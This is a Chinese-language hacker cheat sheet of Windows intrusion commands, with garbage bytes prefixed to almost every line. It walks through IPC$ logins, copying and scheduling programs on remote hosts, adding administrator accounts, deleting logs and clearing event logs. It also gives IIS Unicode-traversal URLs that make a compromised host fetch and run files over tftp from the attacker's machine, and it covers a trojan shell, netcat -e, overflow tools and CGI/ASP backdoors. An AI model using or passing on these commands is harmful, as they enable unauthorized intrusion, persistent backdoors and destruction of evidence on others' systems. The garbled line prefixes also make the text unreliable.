网管和黑客都必须知道的命令
@u:�����`� 常用的几条NET命令:
o[i*i<jv-� TQ0ZBhd��� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
_�6�'@#DN� 5UG9&:zu'V (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
]��lqZ�9rO OhlK;hvdB* (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
{Tdx��sE�> �.w'�b%�M� (查看远程主机时间) net time \\IP地址
1&�<o3)L:� )V��qPaKZl (定时启动某个程序) at \\IP地址 02:18 readme.exe
}[h]z7e2S� b?qV~Dg�k` (查看共享) net view \\IP地址
J@}P�yS��q �,np|KoG|M (查看netbios工作组列表) nbtstat -A IP地址
�� :8==Bu� USHQwn)�%� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
Q1r�EUbvCE iHK.hs��;� (这两条把自己增加到管理员组): net user 用户名 密码 /add
"�?l��z[K> LZ.X�c��y� net localgroup Administrators 用户名 /add
-;�FAS3(wy =�tP^v�gfQ (断开连接) net use \\IP地址\ipc$ /delete
\okv}x^L=Z Ei\>gXTH1- 扫尾:
g j�]8/~lr AO|�1m$xf� del C:\winnt\system32\logfiles\*.*
U�Ub0�[�oy m^3j|'m�G� del C:\winnt\ssytem32\config\*.evt
X�.[bgvm~C _�\Z'Yl�� del C:\winnt\system32\dtclog\*.*
dU�2;�� �� *+�2_!=4V del C:\winnt\system32\*.log
Oh>hy�Y)}� �u86PTp�+ del C:\winnt\system32\*.txt
~(huU���W� �pV;0Hcy�� del C:\winnt\*.txt
�x�(R;��xB \ym^�~ �Q| del C:\winnt\*.log
ZbjUOlE�02 3EY
m@�oZj 一、netsvc.exe
/!�A"[�Tyt Z�Gsd� cnz 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
D�6+3f�#k6 u/-EVCHr
y netsvc /list \\IP地址
BHYguS^�qz S<*I�oZ?�T netsvc schedule \\IP地址 /query
��yjH��'<� +��G�[��zE netsvc \\IP地址 schedule /start
�t u{~:Z( x�po^\E?�2 二、OpenTelnet.exe
�b4bd^nrqV )�b>misb/ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
e8�4%Y8,0 @G=7A;-pv0 OpenTelnet \\IP地址 用户名 密码 1 7878
A�#�1��9&} �\[.���qN 然后就可以telnet到主机的7878端口,进入DOS方式下:
q(��^iT�~} S�E@�TY32T telnet IP地址 7878
W6�i9mE�R- F;h^o�!W7r 三、winshell.exe
;in-)`UC!� GEh�(�p��J 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
F����� ]Zg % XZ��&(�� p Path (查看winshell主程序的路径信息)
�J���5H�K1 L?N-u��ocT b reBoot (重新启动机器)
�$@71 w~�y �#OM)71kB8 d shutDown (关闭机器)
LP|YW*i=IQ Y,Rr[i�"�j s Shell (执行后你就会看到可爱的“C:\>”)
w5~j|c=_W� nXo�DI1�<[ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
zNoFM/1Vb� ~D�4l6�4�� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
w�4�\
3�*� ]H}2|�~c�� 四、3389登陆器,GUI方式登录远程主机的
�C��~@m6�K j3�/�6hE�> 五、elsave.exe
5|K[WvG@Co R�Je�r�x:] 事件日志清除工具
n5.sx|b�I? Dv/�7�w[�F elsave -s \\IP地址 -l "application" -C
DwGM+)��! �4m91X�D�� elsave -s \\IP地址 -l "system" -C
�y2�s(]#�8 ��k_wcol,W elsave -s \\IP地址 -l "security" -C
�?2Z`xL9QT I�#O"<0
*r 执行后成功清除应用程序日志,系统日志,安全日志
tUc<ExvP�, [R%*C9Y �d 六、hbulot.exe
!3k-' ),z& �,����h�'Q 开启win2kserver和winxp的3389服务
d<�Q%��h?E E7?� �n'!= hbulot [/r]
5����>0\= 7I"~a<f0X` 使用/r表示安装完成后自动重起目标使设置生效。
2-8Dc4H]r C`�k�qsK�� 七、nc.exe(netcat.exe)
�\OFm�d!Cz ��Q�r3!��6 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�#!UJY%c�~ �KhB7�75� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
N�F�Er� ,n *Ic�^9njt 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
s_f�e���4K
l:�UKU�!� 参数:
,iP
YsW]�5 +ynhN\S$/ -e prog 程序重定向,一旦连接,就执行 [危险!!]
��}k%�6�X@ %~��Rg�`+� -g gateway source-routing hop point[s], up to 8
-�#��T%�*� Y]0��c%�Fd -G num source-routing pointer: 4, 8, 12, ...
}Cw,m0K�V/ 59l9_y�FJ� -h 帮助信息
�$U�y+]9�
Q> ����y!� -i secs 延时的间隔
M Nw�Y
�
�DAWF
=p]� -l 监听模式,用于入站连接
��JXe~
9/! ���V^[&��4 -n 指定数字的IP地址,不能用hostname
Eq;w5;7�s �P*
��0kz@ -o file 记录16进制的传输
�j��w�E��= N'EZJ�o�H -p port 本地端口号
!P�E�KM�Dh h�?SR�X_�� -r 任意指定本地及远程端口
�zM�&ro,W� �B?8*-0a'[ -s addr 本地源地址
�w�$f_z*/� ��*,lD�o�9 -u UDP模式
T&�pCLvk�z Lv%t*s�2$/ -v 详细输出——用两个-v可得到更详细的内容
JnK<:�]LcK QH�(&�Cu�, -w secs timeout的时间
)?#�K0�o[< E�Dgtn)1� -z 将输入输出关掉——用于扫描时
h0�92S�|iY 八、TFTPD32.EXE
$�#D#ezvxe $aJay]��F� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
`Pj7:�[."[ SQf�[1}$ . http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
A9BoH[is7 Oz-/��0;1n 然后可以直接令文件运行:
~%>i lWaHB E<3xv;v8�r http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Fik���;hB� h�fY/)-60o 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�k0V]<#h87 "M
iJ��M+, 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��p )JR5z TM#�L.xPMf 一、一 Xscan命令行运行参数说明:
8l���y)��G O�8\f]!O(� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
gw,K*ph}�q �m"�Mj�3Z: 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
A8mc+ �Bf( Ss�5��@��n xscan -file <主机列表文件名> <检测项目> [其他选项]
7��S�J�=2 0g:�q�%P�0 其中<检测项目> 含义如下:
=L#&`�s@)_ (N&?�Z]|yr -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
KM[�0aXOtv (y!bvp[" m -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
!��zOj`lx ��p#�P<�V% -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
lJFy(^KQG, FNL�S�=4 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
y��]@JkF�( �zC)JOykI% -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
6}�R*7iM�s �D
)`��(�b [其他选项] 含义如下:
-n�|>��U:� =�ZURh_{xV -v: 显示详细扫描进度
G�P4!�t~"1 "�0�PsCr}! -p: 跳过Ping不通的主机
q�Q�)1��+^ �#|je m �� -o: 跳过没有检测到开放端口的主机
UJ�qh~s�� N}n3 ��+F� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
